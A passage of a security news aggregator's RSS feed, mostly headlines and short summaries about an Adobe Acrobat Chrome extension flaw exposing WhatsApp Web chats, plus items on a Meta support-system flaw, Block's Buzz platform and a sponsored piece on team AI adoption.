CVE-2026-64005, CVE-2026-64006, CVE-2026-64007, CVE-2026-64008,
CVE-2026-64009, CVE-2026-64010, CVE-2026-64011, CVE-2026-64012,
CVE-2026-64013, CVE-2026-64014, CVE-2026-64015, CVE-2026-64017,
CVE-2026-64018, CVE-2026-64019, CVE-2026-64020, CVE-2026-64021,
CVE-2026-64022, CVE-2026-64023, CVE-2026-64024, CVE-2026-64025,
CVE-2026-64026, CVE-2026-64027, CVE-2026-64029, CVE-2026-64030,
CVE-2026-64031, CVE-2026-64032, CVE-2026-64033, CVE-2026-64034,
CVE-2026-64035, CVE-2026-64036, CVE-2026-64037, CVE-2026-64038,
CVE-2026-64039, CVE-2026-64040, CVE-2026-64041, CVE-2026-64042,
CVE-2026-64043, CVE-2026-64044, CVE-2026-64045, CVE-2026-64046,
CVE-2026-64047, CVE-2026-64048, CVE-2026-64049, CVE-2026-64050,
CVE-2026-64051, CVE-2026-64052, CVE-2026-64053, CVE-2026-64054,
CVE-2026-64055, CVE-2026-64056, CVE-2026-64057, CVE-2026-64058,
CVE-2026-64059, CVE-2026-64060, CVE-2026-64061, CVE-2026-64062,
CVE-2026-64063, CVE-2026-64064, CVE-2026-64065, CVE-2026-64066,
CVE-2026-64067, CVE-2026-64068, CVE-2026-64069, CVE-2026-64070,
CVE-2026-64071, CVE-2026-64072, CVE-2026-64073, CVE-2026-64074,
CVE-2026-64075, CVE-2026-64076, CVE-2026-64077, CVE-2026-64078,
CVE-2026-64079, CVE-2026-64080, CVE-2026-64081, CVE-2026-64082,
CVE-2026-64083, CVE-2026-64084, CVE-2026-64085, CVE-2026-64086,
CVE-2026-64087, CVE-2026-64088, CVE-2026-64089, CVE-2026-64090,
CVE-2026-64091, CVE-2026-64093, CVE-2026-64094, CVE-2026-64095,
CVE-2026-64096, CVE-2026-64097, CVE-2026-64098, CVE-2026-64099,
CVE-2026-64100, CVE-2026-64101, CVE-2026-64102, CVE-2026-64103,
CVE-2026-64104, CVE-2026-64105, CVE-2026-64106, CVE-2026-64107,
CVE-2026-64108, CVE-2026-64109, CVE-2026-64110, CVE-2026-64111,
CVE-2026-64112, CVE-2026-64113, CVE-2026-64114, CVE-2026-64115,
CVE-2026-64116, CVE-2026-64117, CVE-2026-64118, CVE-2026-64119,
CVE-2026-64120, CVE-2026-64121, CVE-2026-64122, CVE-2026-64123,
CVE-2026-64124, CVE-2026-64125, CVE-2026-64126, CVE-2026-64127,
CVE-2026-64128, CVE-2026-64129, CVE-2026-64130, CVE-2026-64131,
CVE-2026-64132, CVE-2026-64133, CVE-2026-64134, CVE-2026-64135,
CVE-2026-64136, CVE-2026-64137, CVE-2026-64138, CVE-2026-64139,
CVE-2026-64140, CVE-2026-64141, CVE-2026-64142, CVE-2026-64143,
CVE-2026-64144, CVE-2026-64145, CVE-2026-64146, CVE-2026-64147,
CVE-2026-64148, CVE-2026-64149, CVE-2026-64150, CVE-2026-64151,
CVE-2026-64152, CVE-2026-64153, CVE-2026-64154, CVE-2026-64155,
CVE-2026-64156, CVE-2026-64157, CVE-2026-64158, CVE-2026-64159,
CVE-2026-64160, CVE-2026-64161, CVE-2026-64162, CVE-2026-64163,
CVE-2026-64164, CVE-2026-64165, CVE-2026-64166, CVE-2026-64167,
CVE-2026-64168, CVE-2026-64169, CVE-2026-64170, CVE-2026-64171,
CVE-2026-64172, CVE-2026-64173, CVE-2026-64174, CVE-2026-64175,
CVE-2026-64176, CVE-2026-64177, CVE-2026-64178, CVE-2026-64179,
CVE-2026-64180, CVE-2026-64181, CVE-2026-64182, CVE-2026-64183,
CVE-2026-64184, CVE-2026-64185, CVE-2026-64186)]]></content:encoded>
</item>
<item>
<title><![CDATA[Kommentar: Wie wollen wir in Zukunft noch Sicherheit lernen? - Heise]]></title>
<description><![CDATA[Jede Hochschule, die IT-Security lehrt, hat ein Hacking Lab oder zumindest CTF-artige Aufgaben in den Übungen ihrer Sicherheitsmodule. Parallel dazu ...]]></description>
<link>https://tsecurity.de/de/3688300/it-security-nachrichten/kommentar-wie-wollen-wir-in-zukunft-noch-sicherheit-lernen-heise/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3688300/it-security-nachrichten/kommentar-wie-wollen-wir-in-zukunft-noch-sicherheit-lernen-heise/</guid>
<pubDate>Thu, 23 Jul 2026 09:42:41 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Jede Hochschule, die <b>IT</b>-<b>Security</b> lehrt, hat ein Hacking Lab oder zumindest CTF-artige Aufgaben in den Übungen ihrer Sicherheitsmodule. Parallel dazu ...]]></content:encoded>
</item>
<item>
<title><![CDATA[Adobe Acrobat Extension Flaw Lets Attackers Steal WhatsApp Chats With One Click]]></title>
<description><![CDATA[A newly disclosed vulnerability chain in the Adobe Acrobat Chrome extension, installed on an estimated 329 million browsers, allowed attackers to silently siphon a victim’s entire WhatsApp Web session, including chat contents, contact names, and profile data, by simply luring them to a malicious ...]]></description>
<link>https://tsecurity.de/de/3688174/it-security-nachrichten/adobe-acrobat-extension-flaw-lets-attackers-steal-whatsapp-chats-with-one-click/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3688174/it-security-nachrichten/adobe-acrobat-extension-flaw-lets-attackers-steal-whatsapp-chats-with-one-click/</guid>
<pubDate>Thu, 23 Jul 2026 08:54:51 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A newly disclosed vulnerability chain in the Adobe Acrobat Chrome extension, installed on an estimated 329 million browsers, allowed attackers to silently siphon a victim’s entire WhatsApp Web session, including chat contents, contact names, and profile data, by simply luring them to a malicious webpage. The flaw, tracked as CVE-2026-48294 and dubbed “HermeticReader” by researchers […]</p>
<p>The post <a href="https://cyberpress.org/adobe-acrobat-extension-flaw/">Adobe Acrobat Extension Flaw Lets Attackers Steal WhatsApp Chats With One Click</a> appeared first on <a href="https://cyberpress.org/">Cyber Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Critical Adobe Acrobat Chrome Extension Flaw “HermeticReader” Lets Hackers Hijack WhatsApp Chats of 300M+ Users]]></title>
<description><![CDATA[Guardio Labs has disclosed a critical vulnerability chain in the Adobe Acrobat Chrome extension that could allow a malicious website to hijack and exfiltrate rendered WhatsApp Web data from affected users. This vulnerability is tracked as CVE-2026-48294 and has impacted…
Read more →
The post Crit...]]></description>
<link>https://tsecurity.de/de/3688101/it-security-nachrichten/critical-adobe-acrobat-chrome-extension-flaw-hermeticreader-lets-hackers-hijack-whatsapp-chats-of-300m-users/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3688101/it-security-nachrichten/critical-adobe-acrobat-chrome-extension-flaw-hermeticreader-lets-hackers-hijack-whatsapp-chats-of-300m-users/</guid>
<pubDate>Thu, 23 Jul 2026 07:39:43 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Guardio Labs has disclosed a critical vulnerability chain in the Adobe Acrobat Chrome extension that could allow a malicious website to hijack and exfiltrate rendered WhatsApp Web data from affected users. This vulnerability is tracked as CVE-2026-48294 and has impacted…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/critical-adobe-acrobat-chrome-extension-flaw-hermeticreader-lets-hackers-hijack-whatsapp-chats-of-300m-users/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/critical-adobe-acrobat-chrome-extension-flaw-hermeticreader-lets-hackers-hijack-whatsapp-chats-of-300m-users/">Critical Adobe Acrobat Chrome Extension Flaw “HermeticReader” Lets Hackers Hijack WhatsApp Chats of 300M+ Users</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Critical Adobe Acrobat Chrome Extension Flaw “HermeticReader” Lets Hackers Hijack WhatsApp Chats of 300M+ Users]]></title>
<description><![CDATA[Guardio Labs has disclosed a critical vulnerability chain in the Adobe Acrobat Chrome extension that could allow a malicious website to hijack and exfiltrate rendered WhatsApp Web data from affected users. This vulnerability is tracked as CVE-2026-48294 and has impacted Adobe Acrobat extension ve...]]></description>
<link>https://tsecurity.de/de/3688025/it-security-nachrichten/critical-adobe-acrobat-chrome-extension-flaw-hermeticreader-lets-hackers-hijack-whatsapp-chats-of-300m-users/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3688025/it-security-nachrichten/critical-adobe-acrobat-chrome-extension-flaw-hermeticreader-lets-hackers-hijack-whatsapp-chats-of-300m-users/</guid>
<pubDate>Thu, 23 Jul 2026 07:12:43 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Guardio Labs has disclosed a critical vulnerability chain in the Adobe Acrobat Chrome extension that could allow a malicious website to hijack and exfiltrate rendered WhatsApp Web data from affected users. This vulnerability is tracked as CVE-2026-48294 and has impacted Adobe Acrobat extension version 26.5.2. The extension is installed across approximately 329 million browsers. Adobe […]</p>
<p>The post <a href="https://gbhackers.com/critical-adobe-acrobat-chrome-extension-flaw-hermeticreader-lets-hackers-hijack-whatsapp-chats-of-300m-users/">Critical Adobe Acrobat Chrome Extension Flaw “HermeticReader” Lets Hackers Hijack WhatsApp Chats of 300M+ Users</a> appeared first on <a href="https://gbhackers.com/">GBHackers Security | #1 Globally Trusted Cyber Security News Platform</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Adobe Acrobat Chrome extension bug enabled silent WhatsApp data theft]]></title>
<description><![CDATA[Adobe patched CVE-2026-48294, a flaw in Adobe Acrobat Chrome extension that could let attackers steal WhatsApp Web chats by luring users to a webpage. Guardio Labs researcher Shaked Biner disclosed HermeticReader, a vulnerability chain in the Adobe Acrobat Chrome extension…
Read more →
The post A...]]></description>
<link>https://tsecurity.de/de/3687723/it-security-nachrichten/adobe-acrobat-chrome-extension-bug-enabled-silent-whatsapp-data-theft/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3687723/it-security-nachrichten/adobe-acrobat-chrome-extension-bug-enabled-silent-whatsapp-data-theft/</guid>
<pubDate>Thu, 23 Jul 2026 00:52:33 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Adobe patched CVE-2026-48294, a flaw in Adobe Acrobat Chrome extension that could let attackers steal WhatsApp Web chats by luring users to a webpage. Guardio Labs researcher Shaked Biner disclosed HermeticReader, a vulnerability chain in the Adobe Acrobat Chrome extension…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/adobe-acrobat-chrome-extension-bug-enabled-silent-whatsapp-data-theft/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/adobe-acrobat-chrome-extension-bug-enabled-silent-whatsapp-data-theft/">Adobe Acrobat Chrome extension bug enabled silent WhatsApp data theft</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Adobe Acrobat Chrome extension bug enabled silent WhatsApp data theft]]></title>
<description><![CDATA[Adobe patched CVE-2026-48294, a flaw in Adobe Acrobat Chrome extension that could let attackers steal WhatsApp Web chats by luring users to a webpage. Guardio Labs researcher Shaked Biner disclosed HermeticReader, a vulnerability chain in the Adobe Acrobat Chrome extension that allowed any attack...]]></description>
<link>https://tsecurity.de/de/3687680/it-security-nachrichten/adobe-acrobat-chrome-extension-bug-enabled-silent-whatsapp-data-theft/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3687680/it-security-nachrichten/adobe-acrobat-chrome-extension-bug-enabled-silent-whatsapp-data-theft/</guid>
<pubDate>Wed, 22 Jul 2026 23:58:53 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Adobe patched CVE-2026-48294, a flaw in Adobe Acrobat Chrome extension that could let attackers steal WhatsApp Web chats by luring users to a webpage. Guardio Labs researcher Shaked Biner disclosed HermeticReader, a vulnerability chain in the Adobe Acrobat Chrome extension that allowed any attacker-controlled webpage to silently steal a visitor’s WhatsApp chats, contacts, profile name, […]]]></content:encoded>
</item>
<item>
<title><![CDATA[Adobe Acrobat Extension Flaw Lets Attackers Steal WhatsApp Chats From 329 Million Users]]></title>
<description><![CDATA[A newly disclosed flaw in the Adobe Acrobat Chrome extension allowed attackers to silently harvest WhatsApp Web chats, contacts, and profile data from any user who simply visited a malicious webpage no clicks, downloads, or credential theft required. Security researchers…
Read more →
The post Ado...]]></description>
<link>https://tsecurity.de/de/3687327/it-security-nachrichten/adobe-acrobat-extension-flaw-lets-attackers-steal-whatsapp-chats-from-329-million-users/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3687327/it-security-nachrichten/adobe-acrobat-extension-flaw-lets-attackers-steal-whatsapp-chats-from-329-million-users/</guid>
<pubDate>Wed, 22 Jul 2026 20:38:53 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A newly disclosed flaw in the Adobe Acrobat Chrome extension allowed attackers to silently harvest WhatsApp Web chats, contacts, and profile data from any user who simply visited a malicious webpage no clicks, downloads, or credential theft required. Security researchers…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/adobe-acrobat-extension-flaw-lets-attackers-steal-whatsapp-chats-from-329-million-users/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/adobe-acrobat-extension-flaw-lets-attackers-steal-whatsapp-chats-from-329-million-users/">Adobe Acrobat Extension Flaw Lets Attackers Steal WhatsApp Chats From 329 Million Users</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[WhatsApp Adds Apple Music Sharing, iPad Signups, and New CarPlay Features]]></title>
<description><![CDATA[WhatsApp has announced several new features for iPhone, iPad, CarPlay, Android Auto, desktop, and web users, with the latest update focusing on music sharing, easier account setup, PDF tools, and improved in-car controls. The company says these WhatsApp new features are rolling out now across sup...]]></description>
<link>https://tsecurity.de/de/3687260/ios-mac-os/whatsapp-adds-apple-music-sharing-ipad-signups-and-new-carplay-features/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3687260/ios-mac-os/whatsapp-adds-apple-music-sharing-ipad-signups-and-new-carplay-features/</guid>
<pubDate>Wed, 22 Jul 2026 20:26:28 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[WhatsApp has announced several new features for iPhone, iPad, CarPlay, Android Auto, desktop, and web users, with the latest update focusing on music sharing, easier account setup, PDF tools, and improved in-car controls. The company says these WhatsApp new features are rolling out now across supported devices.



One of the main additions lets users share songs from Apple Music or Spotify directly to their WhatsApp Status. Friends can then see what someone is listening to without leaving the Status screen.




“Sharing music is a way of expressing yourself, and now you can easily share a song straight from Apple Music or Spotify to your WhatsApp Status. With just a couple of taps, your friends can see what you’re into right now, making your Status even more uniquely you,” WhatsApp said.




iPad users can now create a WhatsApp account directly on the tablet instead of linking an existing phone account. WhatsApp introduced this option after users repeatedly requested a simpler signup process for its iPad app.



The refreshed CarPlay and Android Auto experience also lets users hear and reply to messages, make calls, view call history, and reach favourite contacts from the car display. Meanwhile, Adobe Acrobat integration allows desktop and web users to open, highlight, and annotate PDFs inside WhatsApp chats.]]></content:encoded>
</item>
<item>
<title><![CDATA[Adobe Acrobat Extension Flaw Lets Attackers Steal WhatsApp Chats From 329 Million Users]]></title>
<description><![CDATA[A newly disclosed flaw in the Adobe Acrobat Chrome extension allowed attackers to silently harvest WhatsApp Web chats, contacts, and profile data from any user who simply visited a malicious webpage no clicks, downloads, or credential theft required. Security researchers at Guardio Labs uncovered...]]></description>
<link>https://tsecurity.de/de/3687242/it-security-nachrichten/adobe-acrobat-extension-flaw-lets-attackers-steal-whatsapp-chats-from-329-million-users/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3687242/it-security-nachrichten/adobe-acrobat-extension-flaw-lets-attackers-steal-whatsapp-chats-from-329-million-users/</guid>
<pubDate>Wed, 22 Jul 2026 20:24:30 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A newly disclosed flaw in the Adobe Acrobat Chrome extension allowed attackers to silently harvest WhatsApp Web chats, contacts, and profile data from any user who simply visited a malicious webpage no clicks, downloads, or credential theft required. Security researchers at Guardio Labs uncovered the flaw, dubbed “HermeticReader,” and officially tracked as CVE-2026-48294 with a […]</p>
<p>The post <a href="https://cybersecuritynews.com/acrobat-extension-flaw-whatsapp-chats/">Adobe Acrobat Extension Flaw Lets Attackers Steal WhatsApp Chats From 329 Million Users</a> appeared first on <a href="https://cybersecuritynews.com/">Cyber Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Critical Meta Vulnerability Exposed Customer Support Emails, Chats, and Uploaded Files]]></title>
<description><![CDATA[A broken access control flaw in Meta’s shared customer support systems exposed sensitive user data, including emails, chat conversations, and uploaded files. Discovered during security testing of Meta Horizon Managed Solutions, the vulnerability revealed a broader authorization weakness across mu...]]></description>
<link>https://tsecurity.de/de/3686907/it-security-nachrichten/critical-meta-vulnerability-exposed-customer-support-emails-chats-and-uploaded-files/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3686907/it-security-nachrichten/critical-meta-vulnerability-exposed-customer-support-emails-chats-and-uploaded-files/</guid>
<pubDate>Wed, 22 Jul 2026 17:46:46 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A broken access control flaw in Meta’s shared customer support systems exposed sensitive user data, including emails, chat conversations, and uploaded files. Discovered during security testing of Meta Horizon Managed Solutions, the vulnerability revealed a broader authorization weakness across multiple…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/critical-meta-vulnerability-exposed-customer-support-emails-chats-and-uploaded-files/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/critical-meta-vulnerability-exposed-customer-support-emails-chats-and-uploaded-files/">Critical Meta Vulnerability Exposed Customer Support Emails, Chats, and Uploaded Files</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Adobe fixes Chrome extension flaw that could expose WhatsApp chats]]></title>
<description><![CDATA[A chain of vulnerabilities in the Adobe Acrobat Chrome extension could have allowed attackers to steal content from a victim's WhatsApp Web session simply by luring them to a malicious website. Adobe fixed the flaws within days of the report and assigned the issue CVE-2026-48294. Guardio research...]]></description>
<link>https://tsecurity.de/de/3686897/it-security-nachrichten/adobe-fixes-chrome-extension-flaw-that-could-expose-whatsapp-chats/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3686897/it-security-nachrichten/adobe-fixes-chrome-extension-flaw-that-could-expose-whatsapp-chats/</guid>
<pubDate>Wed, 22 Jul 2026 17:44:21 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A chain of vulnerabilities in the Adobe Acrobat Chrome extension could have allowed attackers to steal content from a victim's WhatsApp Web session simply by luring them to a malicious website. Adobe fixed the flaws within days of the report and assigned the issue CVE-2026-48294. Guardio researcher Shaked Biner discovered the vulnerability shortly after Adobe …</p>
<p>The post <a href="https://cyberinsider.com/adobe-fixes-chrome-extension-flaw-that-could-expose-whatsapp-chats/">Adobe fixes Chrome extension flaw that could expose WhatsApp chats</a> appeared first on <a href="https://cyberinsider.com/">CyberInsider</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Jack Dorsey Takes On Slack and GitHub With New AI Workplace Platform 'Buzz']]></title>
<description><![CDATA[Jack Dorsey's Block has launched Buzz, an open-source workplace collaboration platform that combines messaging, project management, and software development workflows for teams of both humans and AI agents. Dorsey described Buzz as "a new groupchat platform for teams of people and agents of all s...]]></description>
<link>https://tsecurity.de/de/3686825/it-security-nachrichten/jack-dorsey-takes-on-slack-and-github-with-new-ai-workplace-platform-buzz/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3686825/it-security-nachrichten/jack-dorsey-takes-on-slack-and-github-with-new-ai-workplace-platform-buzz/</guid>
<pubDate>Wed, 22 Jul 2026 17:19:56 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Jack Dorsey's Block has launched Buzz, an open-source workplace collaboration platform that combines messaging, project management, and software development workflows for teams of both humans and AI agents. Dorsey described Buzz as "a new groupchat platform for teams of people and agents of all sizes" that is "model-agnostic, decentralized, self-sovereign and open source." SmartCompany reports: According to the Buzz website, users can invite specialized AI agents into team chats, allowing them to collaborate with employees and even other AI agents. From there, they can reportedly move directly from discussions into planning, coding, pull requests and project management without switching between multiple applications.
 
Buzz also aims to replace parts of GitHub by bringing software development workflows directly into the platform. Teams can plan work, write code, review pull requests and manage Git projects without jumping between separate collaboration and development tools. [...] In practice, that means businesses aren't locked into a single AI provider. Organisations can self-host Buzz, customize it to suit their own workflows and choose whichever AI models best fit their needs.<p></p><div class="share_submission">
<a class="slashpop" href="http://twitter.com/home?status=Jack+Dorsey+Takes+On+Slack+and+GitHub+With+New+AI+Workplace+Platform+'Buzz'%3A+https%3A%2F%2Fnews.slashdot.org%2Fstory%2F26%2F07%2F22%2F040209%2F%3Futm_source%3Dtwitter%26utm_medium%3Dtwitter"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Fnews.slashdot.org%2Fstory%2F26%2F07%2F22%2F040209%2Fjack-dorsey-takes-on-slack-and-github-with-new-ai-workplace-platform-buzz%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>



</div><p><a href="https://news.slashdot.org/story/26/07/22/040209/jack-dorsey-takes-on-slack-and-github-with-new-ai-workplace-platform-buzz?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Critical Meta Vulnerability Exposed Customer Support Emails, Chats, and Uploaded Files]]></title>
<description><![CDATA[A broken access control flaw in Meta’s shared customer support systems exposed sensitive user data, including emails, chat conversations, and uploaded files. Discovered during security testing of Meta Horizon Managed Solutions, the vulnerability revealed a broader authorization weakness across mu...]]></description>
<link>https://tsecurity.de/de/3686697/it-security-nachrichten/critical-meta-vulnerability-exposed-customer-support-emails-chats-and-uploaded-files/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3686697/it-security-nachrichten/critical-meta-vulnerability-exposed-customer-support-emails-chats-and-uploaded-files/</guid>
<pubDate>Wed, 22 Jul 2026 16:39:29 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A broken access control flaw in Meta’s shared customer support systems exposed sensitive user data, including emails, chat conversations, and uploaded files. Discovered during security testing of Meta Horizon Managed Solutions, the vulnerability revealed a broader authorization weakness across multiple support services within Meta’s ecosystem. What initially seemed to be a limited product-specific flaw quickly […]</p>
<p>The post <a href="https://cybersecuritynews.com/meta-vulnerability-exposed/">Critical Meta Vulnerability Exposed Customer Support Emails, Chats, and Uploaded Files</a> appeared first on <a href="https://cybersecuritynews.com/">Cyber Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Störung bei Instagram]]></title>
<description><![CDATA[Vor allem Chats bei Instagram funktionieren derzeit nur bedingt. Alte Nachrichten laden teilweise nicht, neue werden nicht verschickt.]]></description>
<link>https://tsecurity.de/de/3686676/it-nachrichten/stoerung-bei-instagram/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3686676/it-nachrichten/stoerung-bei-instagram/</guid>
<pubDate>Wed, 22 Jul 2026 16:33:06 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Vor allem Chats bei Instagram funktionieren derzeit nur bedingt. Alte Nachrichten laden teilweise nicht, neue werden nicht verschickt.]]></content:encoded>
</item>
<item>
<title><![CDATA[The compound effect your AI adoption strategy is missing]]></title>
<description><![CDATA[For many engineering teams, AI adoption means individual engineers write code faster while overall team velocity remains stagnant. Individual speed and team speed are produced by different things, and AI has mostly accelerated the first but not the second.



The step from individual AI adoption ...]]></description>
<link>https://tsecurity.de/de/3686645/it-nachrichten/the-compound-effect-your-ai-adoption-strategy-is-missing/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3686645/it-nachrichten/the-compound-effect-your-ai-adoption-strategy-is-missing/</guid>
<pubDate>Wed, 22 Jul 2026 16:23:34 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">For many engineering teams, AI adoption means individual engineers write code faster while overall team velocity remains stagnant. Individual speed and team speed are produced by different things, and AI has mostly accelerated the first but not the second.</p>



<p class="wp-block-paragraph">The step from individual AI adoption to team advantage is one many organizations haven’t taken yet, but it’s the step where real ROI lives. Make the leap and every individual gain starts compounding into something the whole team feels.</p>



<h3 class="wp-block-heading">Faster individuals, but the same team pace</h3>



<p class="wp-block-paragraph">A developer with a good AI assistant can produce more and produce faster, but ten developers all doing that, each in their own way, with their own tools and their own context, don’t add up to a team that is ten times better. More often they add up to a team moving faster in ten different directions.</p>



<p class="wp-block-paragraph">The speed stays with the person who created it. The reasoning, context, and decisions that the rest of the team would need to build on that speed gets lost.</p>



<p class="wp-block-paragraph">These three structural problems explain why:</p>



<h3 class="wp-block-heading">Problem #1: Context evaporates at scale</h3>



<p class="wp-block-paragraph">An engineer spends an hour with an AI agent working through a hard design decision. They land somewhere good. The code ships. But the reasoning, the alternatives they ruled out, and the constraints they discovered stay in a chat history nobody else will ever open. Six weeks later a teammate touches the same system, has no idea any of that thinking happened, and starts over.</p>



<p class="wp-block-paragraph">You can’t prompt your way out of a context vacuum. Agents and teammates alike are only as good as the context they start with, and right now most of that context is being generated and immediately lost. The teams that pull ahead will be the ones that treat the reasoning around the work as something worth capturing.</p>



<h3 class="wp-block-heading">Problem #2: Misalignment creates duplicative work</h3>



<p class="wp-block-paragraph">When individuals move fast in parallel without a shared source of truth, they start stepping on each other’s toes. Two people solve the same problem two different ways. An agent generates a change against a spec that quietly went stale last week. A confidently written pull request follows the wrong internal standard because the standard lived in someone’s head, not in the workflow.</p>



<p class="wp-block-paragraph">This problem gets worse as more of the work becomes agent-driven. Agents overwrite each other. Specs drift out of date faster than anyone updates them. The faster the individual pieces move, the more expensive the collisions become.</p>



<h3 class="wp-block-heading">Problem #3: Trust doesn’t scale</h3>



<p class="wp-block-paragraph">The quiet tax on AI-assisted work is review. If an individual developer can’t see how a piece of work was produced, what the intent was, what the agent was told, what standards it was working against, then they can’t confidently build on it. So, they re-check it, or rewrite it, or route around it. The individual saved an hour. The team spent two earning back the trust.</p>



<p class="wp-block-paragraph">Trust transfers when intent is legible. When a teammate or a reviewer can see what was meant, what was decided, and what guardrails applied, they can accept the work and move on. When they can’t, every handoff becomes a re-litigation.</p>



<h3 class="wp-block-heading">Turning adoption into advantage</h3>



<p class="wp-block-paragraph">The through-line across all three problems is the same. The value of AI at the team level does not live in the code any single person or agent produces. It lives in whether the intent and context around that work is captured, shared, and reusable by everyone else, human and agent.</p>



<p class="wp-block-paragraph">That reframes the leadership job. It’s not about driving more adoption, because your teams already handled that. It’s about building the connective layer that turns individual output into team capability.</p>



<h3 class="wp-block-heading">The window is now</h3>



<p class="wp-block-paragraph">This matters more every month, because the individual productivity story is about to become an agent orchestration story. The organizations that turn individual adoption into team advantage now, while the habits are still forming, will be the ones whose agents actually compound.</p>



<p class="wp-block-paragraph">See how engineering leaders are building the connective layer between individual AI adoption and team-level compound returns at <a href="https://www.atlassian.com/software/jira/dev?utm_source=foundry&amp;utm_medium=paid-social&amp;utm_campaign=P:jira%7CO:ppm%7CV:foundry%7CG:us%7CL:en%7CF:aware%7CT:prospecting%7CI:imc-jira-ai-sdlc%7CA:display%7CD:alld&amp;utm_content=P:jira%7CO:ppm%7CV:foundry%7CG:us%7CL:en%7CF:aware%7CT:prospecting%7CI:imc-jira-ai-sdlc%7CA:display%7CD:alld%7CU:cio-1" target="_blank" rel="noreferrer noopener">jira.dev.</a></p>



<p class="wp-block-paragraph"></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Adobe Chrome extension flaw let sites access private WhatsApp chats]]></title>
<description><![CDATA[The Adobe Acrobat extension for Chrome could be used to access conversations and data rendered in WhatsApp Web without any form of authentication. [...]]]></description>
<link>https://tsecurity.de/de/3686494/it-security-nachrichten/adobe-chrome-extension-flaw-let-sites-access-private-whatsapp-chats/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3686494/it-security-nachrichten/adobe-chrome-extension-flaw-let-sites-access-private-whatsapp-chats/</guid>
<pubDate>Wed, 22 Jul 2026 15:27:23 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
